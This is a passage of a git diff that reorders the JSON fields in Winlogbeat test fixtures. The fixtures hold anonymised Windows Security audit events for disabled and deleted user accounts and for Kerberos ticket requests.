Domain:\\t\\tDOMAIN\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":7304}},\"event_data\":{\"TargetUserName\":\"ACCOUNT\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"jdoe\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x493fa12d\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-4-5-6\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13042691344,\"event_id\":\"4725\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}",
     "sekoiaio": {
       "intake": {
         "dialect": "Elastic Winlogbeat",
         "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b"
       }
-    },
-    "message": "{\"@timestamp\":\"2024-11-12T08:41:11.055Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4725\",\"created\":\"2024-11-12T08:41:11.637Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user account was disabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tjdoe\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x493FA12D\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\"},\"message\":\"A user account was disabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tjdoe\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x493FA12D\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":7304}},\"event_data\":{\"TargetUserName\":\"ACCOUNT\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"jdoe\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x493fa12d\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-4-5-6\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13042691344,\"event_id\":\"4725\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}"
+    }
   },
   "expected": {
     "message": "{\"@timestamp\":\"2024-11-12T08:41:11.055Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4725\",\"created\":\"2024-11-12T08:41:11.637Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user account was disabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tjdoe\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x493FA12D\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\"},\"message\":\"A user account was disabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tjdoe\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x493FA12D\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":7304}},\"event_data\":{\"TargetUserName\":\"ACCOUNT\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"jdoe\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x493fa12d\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-4-5-6\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13042691344,\"event_id\":\"4725\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}",
diff --git a/Beats/winlogbeat/tests/security_event_4726.json b/Beats/winlogbeat/tests/security_event_4726.json
index e147e2eb4..73c1d823c 100644
--- a/Beats/winlogbeat/tests/security_event_4726.json
+++ b/Beats/winlogbeat/tests/security_event_4726.json
@@ -1,12 +1,12 @@
 {
   "input": {
+    "message": "{\"@version\":\"1\",\"log\":{\"level\":\"information\"},\"@timestamp\":\"2024-11-12T07:58:13.288Z\",\"message\":\"A user account was deleted.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tdoe.j\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3005C1F76\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tsmithee.a\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t-\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"code\":\"4726\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"kind\":\"event\",\"created\":\"2024-11-12T07:58:14.553Z\"},\"agent\":{\"hostname\":\"hostname\",\"id\":\"12345678-ABCD-ef90-1234-abcdef123456\",\"type\":\"winlogbeat\",\"name\":\"hostname\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"version\":\"7.17.1\"},\"zone\":\"int\",\"site\":\"site\",\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"process\":{\"pid\":632,\"thread\":{\"id\":2056}},\"event_data\":{\"SubjectLogonId\":\"0x3005c1f76\",\"PrivilegeList\":\"-\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"doe.j\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3-4-5\",\"TargetUserName\":\"smithee.a\",\"TargetDomainName\":\"DOMAIN\"},\"record_id\":25349190364,\"event_id\":\"4726\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"task\":\"User Account Management\",\"computer_name\":\"hostname.domain.net\"},\"ecs\":{\"version\":\"1.12.0\"},\"host\":{\"name\":\"hostname.domain.net\"},\"tags\":[\"windows\",\"domain-controller\",\"beats_input_codec_plain_applied\"]}",
     "sekoiaio": {
       "intake": {
         "dialect": "Elastic Winlogbeat",
         "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b"
       }
-    },
-    "message": "{\"@version\":\"1\",\"log\":{\"level\":\"information\"},\"@timestamp\":\"2024-11-12T07:58:13.288Z\",\"message\":\"A user account was deleted.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tdoe.j\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3005C1F76\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tsmithee.a\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t-\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"code\":\"4726\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"kind\":\"event\",\"created\":\"2024-11-12T07:58:14.553Z\"},\"agent\":{\"hostname\":\"hostname\",\"id\":\"12345678-ABCD-ef90-1234-abcdef123456\",\"type\":\"winlogbeat\",\"name\":\"hostname\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"version\":\"7.17.1\"},\"zone\":\"int\",\"site\":\"site\",\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"process\":{\"pid\":632,\"thread\":{\"id\":2056}},\"event_data\":{\"SubjectLogonId\":\"0x3005c1f76\",\"PrivilegeList\":\"-\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"doe.j\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3-4-5\",\"TargetUserName\":\"smithee.a\",\"TargetDomainName\":\"DOMAIN\"},\"record_id\":25349190364,\"event_id\":\"4726\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"task\":\"User Account Management\",\"computer_name\":\"hostname.domain.net\"},\"ecs\":{\"version\":\"1.12.0\"},\"host\":{\"name\":\"hostname.domain.net\"},\"tags\":[\"windows\",\"domain-controller\",\"beats_input_codec_plain_applied\"]}"
+    }
   },
   "expected": {
     "message": "{\"@version\":\"1\",\"log\":{\"level\":\"information\"},\"@timestamp\":\"2024-11-12T07:58:13.288Z\",\"message\":\"A user account was deleted.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tdoe.j\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3005C1F76\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tsmithee.a\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t-\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"code\":\"4726\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"kind\":\"event\",\"created\":\"2024-11-12T07:58:14.553Z\"},\"agent\":{\"hostname\":\"hostname\",\"id\":\"12345678-ABCD-ef90-1234-abcdef123456\",\"type\":\"winlogbeat\",\"name\":\"hostname\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"version\":\"7.17.1\"},\"zone\":\"int\",\"site\":\"site\",\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"process\":{\"pid\":632,\"thread\":{\"id\":2056}},\"event_data\":{\"SubjectLogonId\":\"0x3005c1f76\",\"PrivilegeList\":\"-\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"doe.j\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3-4-5\",\"TargetUserName\":\"smithee.a\",\"TargetDomainName\":\"DOMAIN\"},\"record_id\":25349190364,\"event_id\":\"4726\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"task\":\"User Account Management\",\"computer_name\":\"hostname.domain.net\"},\"ecs\":{\"version\":\"1.12.0\"},\"host\":{\"name\":\"hostname.domain.net\"},\"tags\":[\"windows\",\"domain-controller\",\"beats_input_codec_plain_applied\"]}",
diff --git a/Beats/winlogbeat/tests/security_event_4768.json b/Beats/winlogbeat/tests/security_event_4768.json
index 53d650df2..c7ac196ea 100644
--- a/Beats/winlogbeat/tests/security_event_4768.json
+++ b/Beats/winlogbeat/tests/security_event_4768.json
@@ -1,12 +1,12 @@
 {
   "input": {
+    "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un ticket d\u2019authentification Kerberos (TGT) a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount\\n\\tNom du domaine Kerberos fourni :\\tDOMAIN\\n\\tID de l\u2019utilisateur :\\t\\t\\tS-1-2-3\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tservice\\n\\tID du service :\\t\\tS-1-2-3-4-5\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t51261\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810010\\n\\tCode de r\u00e9sultat :\\t\\t0x0\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tType de pr\u00e9-authentification :\\t2\\n\\nInformations sur le certificat :\\n\\tNom de l\u2019\u00e9metteur du certificat :\\t\\t\\n\\tNum\u00e9ro de s\u00e9rie du certificat :\\t\\n\\t Empreinte num\u00e9rique du certificat :\\t\\t\\n\\nLes informations sur le certificat sont fournies uniquement si un certificat a \u00e9t\u00e9 utilis\u00e9 pour la pr\u00e9-authentification.\\n\\nLes types de pr\u00e9-authentification, les options de ticket, les types de chiffrement et les codes de r\u00e9sultats sont d\u00e9finis dans la RFC 4120.\",\"code\":\"4768\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:17:12.392Z\",\"action\":\"Service d\u2019authentification Kerberos\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:17:10.124Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un ticket d\u2019authentification Kerberos (TGT) a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount\\n\\tNom du domaine Kerberos fourni :\\tDOMAIN\\n\\tID de l\u2019utilisateur :\\t\\t\\tS-1-2-3\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tservice\\n\\tID du service :\\t\\tS-1-2-3-4-5\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t51261\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810010\\n\\tCode de r\u00e9sultat :\\t\\t0x0\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tType de pr\u00e9-authentification :\\t2\\n\\nInformations sur le certificat :\\n\\tNom de l\u2019\u00e9metteur du certificat :\\t\\t\\n\\tNum\u00e9ro de s\u00e9rie du certificat :\\t\\n\\t Empreinte num\u00e9rique du certificat :\\t\\t\\n\\nLes informations sur le certificat sont fournies uniquement si un certificat a \u00e9t\u00e9 utilis\u00e9 pour la pr\u00e9-authentification.\\n\\nLes types de pr\u00e9-authentification, les options de ticket, les types de chiffrement et les codes de r\u00e9sultats sont d\u00e9finis dans la RFC 4120.\",\"host\":{\"name\":\"HOSTNAME.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Service d\u2019authentification Kerberos\",\"computer_name\":\"HOSTNAME.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"TicketEncryptionType\":\"0x12\",\"TicketOptions\":\"0x40810010\",\"IpPort\":\"51261\",\"TargetDomainName\":\"DOMAIN\",\"TargetUserName\":\"account\",\"TargetSid\":\"S-1-2-3\",\"PreAuthType\":\"2\",\"Status\":\"0x0\",\"ServiceSid\":\"S-1-2-3-4-5\",\"IpAddress\":\"::ffff:1.2.3.4\",\"ServiceName\":\"service\"},\"process\":{\"thread\":{\"id\":3228},\"pid\":560},\"event_id\":\"4768\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":2476587536},\"@version\":\"1\"}",
     "sekoiaio": {
       "intake": {
         "dialect": "Elastic Winlogbeat",
         "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b"
       }
-    },
-    "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un ticket d\u2019authentification Kerberos (TGT) a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount\\n\\tNom du domaine Kerberos fourni :\\tDOMAIN\\n\\tID de l\u2019utilisateur :\\t\\t\\tS-1-2-3\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tservice\\n\\tID du service :\\t\\tS-1-2-3-4-5\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t51261\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810010\\n\\tCode de r\u00e9sultat :\\t\\t0x0\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tType de pr\u00e9-authentification :\\t2\\n\\nInformations sur le certificat :\\n\\tNom de l\u2019\u00e9metteur du certificat :\\t\\t\\n\\tNum\u00e9ro de s\u00e9rie du certificat :\\t\\n\\t Empreinte num\u00e9rique du certificat :\\t\\t\\n\\nLes informations sur le certificat sont fournies uniquement si un certificat a \u00e9t\u00e9 utilis\u00e9 pour la pr\u00e9-authentification.\\n\\nLes types de pr\u00e9-authentification, les options de ticket, les types de chiffrement et les codes de r\u00e9sultats sont d\u00e9finis dans la RFC 4120.\",\"code\":\"4768\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:17:12.392Z\",\"action\":\"Service d\u2019authentification Kerberos\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:17:10.124Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un ticket d\u2019authentification Kerberos (TGT) a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount\\n\\tNom du domaine Kerberos fourni :\\tDOMAIN\\n\\tID de l\u2019utilisateur :\\t\\t\\tS-1-2-3\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tservice\\n\\tID du service :\\t\\tS-1-2-3-4-5\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t51261\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810010\\n\\tCode de r\u00e9sultat :\\t\\t0x0\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tType de pr\u00e9-authentification :\\t2\\n\\nInformations sur le certificat :\\n\\tNom de l\u2019\u00e9metteur du certificat :\\t\\t\\n\\tNum\u00e9ro de s\u00e9rie du certificat :\\t\\n\\t Empreinte num\u00e9rique du certificat :\\t\\t\\n\\nLes informations sur le certificat sont fournies uniquement si un certificat a \u00e9t\u00e9 utilis\u00e9 pour la pr\u00e9-authentification.\\n\\nLes types de pr\u00e9-authentification, les options de ticket, les types de chiffrement et les codes de r\u00e9sultats sont d\u00e9finis dans la RFC 4120.\",\"host\":{\"name\":\"HOSTNAME.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Service d\u2019authentification Kerberos\",\"computer_name\":\"HOSTNAME.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"TicketEncryptionType\":\"0x12\",\"TicketOptions\":\"0x40810010\",\"IpPort\":\"51261\",\"TargetDomainName\":\"DOMAIN\",\"TargetUserName\":\"account\",\"TargetSid\":\"S-1-2-3\",\"PreAuthType\":\"2\",\"Status\":\"0x0\",\"ServiceSid\":\"S-1-2-3-4-5\",\"IpAddress\":\"::ffff:1.2.3.4\",\"ServiceName\":\"service\"},\"process\":{\"thread\":{\"id\":3228},\"pid\":560},\"event_id\":\"4768\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":2476587536},\"@version\":\"1\"}"
+    }
   },
   "expected": {
     "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un ticket d\u2019authentification Kerberos (TGT) a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount\\n\\tNom du domaine Kerberos fourni :\\tDOMAIN\\n\\tID de l\u2019utilisateur :\\t\\t\\tS-1-2-3\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tservice\\n\\tID du service :\\t\\tS-1-2-3-4-5\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t51261\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810010\\n\\tCode de r\u00e9sultat :\\t\\t0x0\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tType de pr\u00e9-authentification :\\t2\\n\\nInformations sur le certificat :\\n\\tNom de l\u2019\u00e9metteur du certificat :\\t\\t\\n\\tNum\u00e9ro de s\u00e9rie du certificat :\\t\\n\\t Empreinte num\u00e9rique du certificat :\\t\\t\\n\\nLes informations sur le certificat sont fournies uniquement si un certificat a \u00e9t\u00e9 utilis\u00e9 pour la pr\u00e9-authentification.\\n\\nLes types de pr\u00e9-authentification, les options de ticket, les types de chiffrement et les codes de r\u00e9sultats sont d\u00e9finis dans la RFC 4120.\",\"code\":\"4768\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:17:12.392Z\",\"action\":\"Service d\u2019authentification Kerberos\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:17:10.124Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un ticket d\u2019authentification Kerberos (TGT) a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount\\n\\tNom du domaine Kerberos fourni :\\tDOMAIN\\n\\tID de l\u2019utilisateur :\\t\\t\\tS-1-2-3\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tservice\\n\\tID du service :\\t\\tS-1-2-3-4-5\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t51261\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810010\\n\\tCode de r\u00e9sultat :\\t\\t0x0\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tType de pr\u00e9-authentification :\\t2\\n\\nInformations sur le certificat :\\n\\tNom de l\u2019\u00e9metteur du certificat :\\t\\t\\n\\tNum\u00e9ro de s\u00e9rie du certificat :\\t\\n\\t Empreinte num\u00e9rique du certificat :\\t\\t\\n\\nLes informations sur le certificat sont fournies uniquement si un certificat a \u00e9t\u00e9 utilis\u00e9 pour la pr\u00e9-authentification.\\n\\nLes types de pr\u00e9-authentification, les options de ticket, les types de chiffrement et les codes de r\u00e9sultats sont d\u00e9finis dans la RFC 4120.\",\"host\":{\"name\":\"HOSTNAME.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Service d\u2019authentification Kerberos\",\"computer_name\":\"HOSTNAME.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"TicketEncryptionType\":\"0x12\",\"TicketOptions\":\"0x40810010\",\"IpPort\":\"51261\",\"TargetDomainName\":\"DOMAIN\",\"TargetUserName\":\"account\",\"TargetSid\":\"S-1-2-3\",\"PreAuthType\":\"2\",\"Status\":\"0x0\",\"ServiceSid\":\"S-1-2-3-4-5\",\"IpAddress\":\"::ffff:1.2.3.4\",\"ServiceName\":\"service\"},\"process\":{\"thread\":{\"id\":3228},\"pid\":560},\"event_id\":\"4768\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":2476587536},\"@version\":\"1\"}",
diff --git a/Beats/winlogbeat/tests/security_event_4769.json b/Beats/winlogbeat/tests/security_event_4769.json
index 7b1f0f39d..ac4cdd94d 100644
--- a/Beats/winlogbeat/tests/security_event_4769.json
+++ b/Beats/winlogbeat/tests/security_event_4769.json
@@ -1,12 +1,12 @@
 {
   "input": {
+    "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un ticket de service Kerberos a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount@DOMAIN.PRIV\\n\\tDomaine du compte :\\t\\tDOMAIN.PRIV\\n\\tGUID d\u2019ouverture de session :\\t\\t{12345678-ABCD-EF90-1234-123456ABCDEF}\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tSERVICE$\\n\\tID du service :\\t\\tS-1-2-3\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t50754\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810000\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tCode d\u2019\u00e9chec :\\t\\t0x0\\n\\tServices en transit :\\t-\\n\\nC\u2019et \u00e9v\u00e9nement est g\u00e9n\u00e9r\u00e9 \u00e0 chaque fois qu\u2019un acc\u00e8s est demand\u00e9 \u00e0 une ressource comme un ordinateur ou un service Windows. Le nom du service indique la ressource \u00e0 laquelle 